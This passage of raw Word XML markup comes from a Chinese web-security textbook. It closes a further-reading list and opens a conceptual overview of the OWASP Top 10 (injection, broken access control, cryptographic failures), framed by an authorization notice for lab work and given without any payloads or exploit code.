        </w:rPr>
        <w:t xml:space="preserve">章（会话固定与爆破）及第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全头）深度关联，建议在后续学习时返回本节回顾相关原理。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="156"/>
    <w:bookmarkStart w:id="157" w:name="延伸阅读白名单-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方出品的免费在线学习平台，从代理配置到各类漏洞的交互式实验环境，是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用者首选进阶资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide, v4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(及后续更新)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章节“Information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Gathering”和“Configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Deployment Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing”详述了安全头检测与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全测试的检查清单与方法论。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s Handbook》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版）：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章“Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Technologies”和第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章“A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Toolkit”深入讲解了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实战技巧与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议弱点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla MDN Web Docs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Set-Cookie”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Content-Security-Policy”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Strict-Transport-Security”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等页面提供了权威的技术参考与最新浏览器兼容性信息。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="157"/>
    <w:bookmarkStart w:id="158" w:name="owasp-top-10-总览习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">总览·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离重申框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节为理论框架与风险总览，但其指向的全部靶机实验与实操均须在严格授权环境中进行。请读者务必回顾并遵守第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节开篇的“授权与隔离声明”——所有命令与操作仅限在自建隔离实验室或已取得书面授权的靶机中执行，实验网络必须与生产及公网隔离。对未授权系统的测试属违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">从工具到地图：OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">作为全书导航</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节建立了安全视角下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">补充知识与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截能力，这些构成了实战中“观察与干预”的微观操作手段。然而，面对一个完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用，安全测试者还需要一张宏观的风险地图，以免遗漏重大攻击面。这张地图正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP（Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Application Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Project，开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全项目）定期发布的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文档。它并非严格的学术排名，而是由全球安全社区凝聚的“Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全风险共识清单”。Stuttard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pinto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》中强调，Top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的价值在于为攻防双方提供一份不遗漏重大攻击面的全景图，而非一份机械的检查表。在本卷中，OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正是这样一张地图：它在逻辑上将各章组织为一条以风险类型为轴的纵深防御路径。同时，我们在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节推荐的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交互实验，也正是围绕这些风险类别设计的，将其作为动手练习场，可与本节分类框架形成“理论—实践”闭环。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者视角看，Top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每一类风险都对应一个被违反的“安全假设”——开发者假设用户输入是良性的、假设会话令牌不可预测、假设内网地址不会被外部触及。攻击者通过探测这些被违反的假设找到突破点。从防御者视角看，Top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提醒我们：有效的安全工程是在需求、设计、编码、测试与运维各环节中，有意识地维护每一类安全假设。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为此提供了系统化的测试用例，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则将测试用例转化为可动手验证的实验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下内容不编造具体排名年份与数字细节——OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的编号与条目在不同版本间有所调整，此处的分类着眼于恒定的风险类型，且仅使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方公开的分类框架。每一类风险均以“假设被违反在哪”的方式给出直觉定性，并指向本卷对应章节。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="158"/>
    <w:bookmarkStart w:id="159" w:name="owasp-top-10-风险类别总览与卷内章节地图"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2.1 OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风险类别总览与卷内章节地图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">一、注入（Injection）——假设“数据与代码的边界能被可靠维持”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全史上最具持久杀伤力的风险类别。其第一性原理直觉为：当应用将用户可控的数据片段拼接进一段将被解释器执行的指令序列时，攻击者可以在数据中嵌入指令元字符或关键字，使之“越狱”进入代码空间而被执行。被违反的假设是：字符串拼接本身能够清晰地区分“需要原样保留的数据”和“需要执行的命令”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入（SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection）让攻击者修改数据库查询的逻辑；命令注入（Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection）让攻击者在操作系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中执行任意命令；LDAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、XPath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、NoSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入等均属同一家族——只是解释器不同。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将注入列为最严重的风险之一，正是因为其危害从数据泄露到完全控制服务器不等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章《注入类：SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入与命令注入》。该章详述联合查询注入（UNION）、布尔盲注、时间盲注与命令注入，并给出根治方案——参数化查询与预编译语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">二、失效的访问控制（Broken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Control）——假设“权限检查在每一请求路径上都被正确执行”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问控制决定了谁可以对什么资源执行何种操作。这一假设失效意味着：攻击者可以通过修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL、篡改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数、绕过前端界面直接调用后端接口等简单手段，访问或操作本不该暴露的数据与功能。典型的失效模式包括：垂直越权（普通用户执行管理员操作）、水平越权（用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的数据）、目录遍历（通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问服务器文件系统）、以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS（跨域资源共享）配置错误导致任意域读取敏感响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直觉上，开发者常常假设“用户只会通过我们提供的界面来访问应用”，并仅在前端进行权限校验。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特别指出，访问控制的每一个决策点必须在后端、对于每一次请求独立执行，且默认策略应为“拒绝”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章《认证与会话》涵盖会话管理与访问控制的关联（如垂直/水平越权），第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章《进阶</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web》将涉及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级别的对象级授权（BOLA/IDOR）问题。目录遍历与文件包含则在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节重点展开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">三、加密失败（Cryptographic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Failures）——假设“敏感数据在传输与存储中得到了有效加密保护”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一风险过去常被称为“敏感数据泄露”，但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将其重新聚焦于密码学防护的失败。假设被违反的情形包括：使用明文协议（HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS）传输敏感数据、使用弱密码算法（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DES、RC4、MD5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用于密码哈希）、密钥硬编码在源码中、证书验证被禁用、以及缺少</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全头（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HSTS）导致降级攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直觉要点在于：密码学固然是强有力的保护工具，但错误的使用方式使其形同虚设。Aumasson</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在《Serious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography》中反复警示，密码学工程中的每一个细节——初始化向量（IV）的随机性、分组密码的工作模式选择、密钥管理与轮换——都不可忽略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
